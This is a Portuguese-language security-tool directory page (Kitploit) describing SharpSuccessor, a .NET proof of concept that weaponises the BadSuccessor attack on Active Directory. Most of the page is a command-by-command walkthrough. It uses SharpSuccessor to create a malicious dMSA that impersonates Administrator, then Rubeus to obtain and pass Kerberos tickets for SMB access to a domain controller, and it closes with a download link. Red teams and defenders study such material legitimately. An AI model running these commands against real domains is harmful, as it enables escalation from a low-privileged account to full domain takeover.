Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpSuccessor — SharpSuccessor é uma Prova de Conceito (POC) em .NET para armar completamente o ataque BadSuccessor de Yuval Gordon (@YuG0rd), da Akamai. | Kitploit
Ferramentas/GitHubGitHub/logangoins/sharpsuccessor
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de PenetraçãoGerenciamento de Identidade e Acesso (IAM)AutenticaçãoRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor é uma Prova de Conceito (POC) em .NET para armar completamente o ataque BadSuccessor de Yuval Gordon (@YuG0rd), da Akamai.

Ver Repositório
421704há 11 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpSuccessor

O SharpSuccessor é uma Prova de Conceito (POC) em .NET para armar completamente o ataque BadSuccessor de Yuval Gordon (@YuG0rd) da Akamai. Um usuário com privilégios baixos que tenha permissões CreateChild sobre qualquer Unidade Organizacional (OU) no domínio Active Directory e acesso de escrita em um objeto-alvo pode realizar a tomada de conta.

Use o SharpSuccessor para adicionar e armar o objeto dMSA, bem como gravar os atributos adequados na conta de destino que você deseja personificar:

root@kitploit:~
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

Solicite um TGT no contexto do usuário atual, neste caso jdoe:

root@kitploit:~
Rubeus.exe tgtdeleg /nowrap

image

Em seguida, use esse tgt para personificar a conta dMSA:

root@kitploit:~
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

Agora você pode solicitar um ticket de serviço com o contexto de Administrador para qualquer SPN, incluindo os Controladores de Domínio para pós-exploração. Por exemplo, aqui vou mostrar privilégios de administrador para SMB no controlador de domínio:

root@kitploit:~
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

Agora que temos o ticket na memória, podemos testar o acesso:

image

Assistência e Inspirações

Muito obrigado a Jim Sykora e Garrett Foster pelas inspirações e assistência para esta ferramenta!

Baixar ferramenta